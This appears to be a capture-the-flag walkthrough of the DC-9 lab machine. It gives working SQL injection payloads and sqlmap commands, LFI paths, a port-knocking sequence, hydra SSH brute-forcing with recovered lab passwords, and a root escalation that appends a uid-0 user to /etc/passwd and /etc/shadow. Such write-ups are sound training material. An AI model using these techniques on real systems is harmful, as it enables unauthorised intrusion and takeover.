Home Lab Setup Case 1 Case 2 Case 3 HackTheBox Vulnhub Offsec Proving Grounds

DC-9 (OffSec Proving Grounds)

DC‑9 is a multi‑step machine: SQL injection leads to credential extraction, which then combines with LFI and port knocking to unlock SSH. Privilege escalation is achieved by abusing a custom script that appends arbitrary content to system files.

Overview

Target: DC‑9
Initial vector: SQLi → credentials → LFI → knockd → SSH
Privilege escalation: custom script → append to /etc/passwd//etc/shadow

Foothold – SQL Injection

The application uses /display.php and /results.php. results.php is vulnerable to SQL injection via the search parameter.

Basic tests:

' OR 1=1 ORDER BY 7-- -
' OR 1=1 ORDER BY 6-- -   (6 columns)
Moe' OR 1=1 UNION SELECT 1,2,3,4,5,version()-- -
-> 10.3.17-MariaDB-0+deb10u1

Capture the POST request:

$ nc -nlvp 9999
$ curl 'http://192.168.169.209/results.php' \
  --data-raw 'search=Moe%27+OR+1%3D1+UNION+SELECT+1%2C2%2C3%2C4%2C5%2Cversion%28%29--+-' \
  -x http://localhost:9999

Save as req.txt and use sqlmap:

$ sqlmap -r req.txt --batch -p search --dbs
-> Users, Staff

$ sqlmap -r req.txt --batch -p search --dump -D Users
$ sqlmap -r req.txt --batch -p search --dump -D Staff
-> admin:856f5de590ef37314e7c3bdf6f8a66dc

Crack the hash:

-> transorbital1

Login at /manage.php as admin.

LFI & Port Knocking

/manage.php shows “File does not exist” → try LFI: 

http://192.168.169.209/manage.php?file=../../../../../../../../etc/passwd
http://192.168.169.209/manage.php?file=../../../../../../../../etc/knockd.conf

knockd.conf reveals a port knocking sequence. Use nmap: 

$ nmap -Pn --host-timeout 201 --max-retries 0 192.168.169.209 -p 7469
$ nmap -Pn --host-timeout 201 --max-retries 0 192.168.169.209 -p 8475
$ nmap -Pn --host-timeout 201 --max-retries 0 192.168.169.209 -p 9842

Now SSH is open. Use hydra: 

$ hydra -L Possible-Users.txt -P Possible-Passwords.txt 192.168.169.209 ssh
-> chandlerb : UrAG0D!
-> joeyt     : Passw0rd
-> janitor   : Ilovepeepee

SSH as janitor:

$ ssh janitor@192.168.169.209
Password: Ilovepeepee

Check ~/.secrets-for-putin/passwords-found-on-post-it-notes.txt for more passwords and build a larger list.

Run hydra again with extended lists:

$ hydra -L FF-users.txt -P FF-passwords.txt 192.168.169.209 ssh
-> fredf : B4-Tru3-001

Switch to fredf:

$ su fredf
Password: B4-Tru3-001

Privilege Escalation – Custom Append Script

Check sudo:

$ sudo -l
-> /opt/devstuff/dist/test/test

The script reads from one file and appends to another. Abuse it to append a new root user to /etc/passwd and /etc/shadow.

Create a password hash:

$ echo -n "123" | openssl passwd -6 -stdin

Create lines:

/tmp/new-etc-passwd-user-line:
testuser77:x:0:0::/home/testuser77:/bin/bash

/tmp/new-etc-shadow-user-line:
testuser77:$6$randomsalt$hashedpassword:18936:0:99999:7:::

Use the script (via sudo) to append these lines to the respective files. Then: 

$ su testuser77
Password: 123
# id; whoami